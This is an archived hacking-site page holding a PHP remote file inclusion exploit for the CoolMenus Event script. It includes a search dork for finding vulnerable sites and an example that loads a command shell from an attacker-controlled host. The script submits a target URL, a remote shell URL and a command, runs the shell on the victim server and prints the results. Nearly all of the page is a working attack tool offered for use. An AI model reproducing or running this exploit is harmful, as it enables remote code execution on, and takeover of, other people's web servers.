AOH :: HP Unsorted C :: B06-1953.HTM

Coolmenus event remote file inclusion exploit



CoolMenus Event Remote File Inclusion exploit
CoolMenus Event Remote File Inclusion exploit



Site:http://www.Aria-security.net
Dork:"/event/index.php?page="

example:
target:http://www.site.com/event/index.php?page=
cmdshell:http://www.own3r.com/cmd.txt?

*/

$cmd = $_POST["cmd"];
$target = $_POST["target"];
$cmdshell = $_POST["cmdshell"];

$form= "
" ."target:

" ."cmdshell:

" ."cmd:

" ."" ."

"; if (!isset($_POST['submit'])) { echo $form; }else{ $file = fopen ("test.txt", "w+"); fwrite($file, ""); fclose($file); $file = fopen ($target.$cmdshell, "r"); if (!$file) { echo "

Unable to get output.\n"; exit; } echo $form; while (!feof ($file)) { $line .= fgets ($file, 1024)."
"; } $tpos1 = strpos($line, "++BEGIN++"); $tpos2 = strpos($line, "++END++"); $tpos1 = $tpos1+strlen("++BEGIN++"); $tpos2 = $tpos2-$tpos1; $output = substr($line, $tpos1, $tpos2); echo $output; } ?>

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.